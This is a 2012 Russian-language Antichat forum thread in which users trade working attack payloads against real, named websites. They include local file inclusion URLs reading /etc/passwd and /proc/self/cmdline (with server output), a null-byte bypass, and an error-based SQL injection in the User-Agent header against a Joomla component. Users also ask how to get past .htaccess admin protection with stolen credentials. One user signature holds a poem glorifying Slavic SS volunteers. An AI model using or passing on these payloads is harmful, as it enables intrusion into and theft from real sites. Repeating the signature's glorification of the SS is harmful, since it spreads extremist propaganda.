ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.03.2012, 15:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от qaz
qaz said:
почитал, наол много итересного,
такс а вот теперь, вопрос, а есть ла какойто софт для поиска логов апача?
просто вручную както тупо.
вот дппустим etc/passwd нашол
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd
а логи не получается
мне как тот весь список что тут /thread91807.html
в ручную переберать?
или может есть более умный способ для их поиска? подскажите
/thread49775.html
вот тут поищи, там где то в теме был вроде скрипт
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
14.03.2012, 16:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Сообщение от qaz
qaz said:
почитал, наол много итересного,
такс а вот теперь, вопрос, а есть ла какойто софт для поиска логов апача?
просто вручную както тупо.
вот дппустим etc/passwd нашол
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd
а логи не получается
мне как тот весь список что тут /thread91807.html
в ручную переберать?
или может есть более умный способ для их поиска? подскажите
http://wonted.ru/programms/librute/
https://rdot.org/forum/showthread.php?t=1142
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
14.03.2012, 16:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от shell_c0de
shell_c0de said:
http://wonted.ru/programms/librute/
ухты, спасиб, но прога немного фуфловатся, ечто что именно касается словаря,
ведь допустим путь может быть разный, не только
../../../../etc/passwd а и юольше ../../../../../../etc/passwd и меньше,
мне как надо срегеть пути рзный длины и все записывать, получается? или я чегото непонимаю?
|
|
|
|
14.03.2012, 16:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
Сообщение от kise
kise said:
А там вроде идет такой инклуд - http://zamok-met.ru/catalog/somefile? Или я не в теме
?
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd%00
|
|
|
|
14.03.2012, 17:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
17281
Репутация:
-4
|
|
Подскажите как использовать эту инъекцию...
GET http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
|
|
|
|
14.03.2012, 17:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от kise
kise said:
Подскажите как использовать эту инъекцию...
GET http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
http://en.wikipedia.org/wiki/List_of_HTTP_headers
Изучай
|
|
|
|
14.03.2012, 17:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от qaz
qaz said:
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd
Выполнение PHP кода:
http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&
Вернет:
/bin/apache2___[zamok-met.ru] GET /catalog.php?id=../../../../proc/self/cmdline%00&Linux cabol.beget.ru 2.6.35.14 #4 SMP Sun Aug 14 23:30:33 MSD 2011 x86_64 HTTP/1.0
Запрос отправлять не через браузер, иначе все символы урлкодируются.
Сообщение от qaz
qaz said:
или может есть более умный способ для их поиска? подскажите
Руки и голова
|
|
|
|
14.03.2012, 18:52
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
На админку стоит дополнительная авторизация .htaccess. Как-нить можно попасть в админ панель?
П.С. Все логин, пасс админа есть
|
|
|
|
14.03.2012, 18:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
17281
Репутация:
-4
|
|
Спасибо за ответ, не могли бы ли вы подсказать какой-нибудь удобный инструмент для эксплуатации уязвимости?
|
|
|
|
14.03.2012, 19:02
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Плагины мозиллы
HttpREQ
Inetcrack
самописные скрипты
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
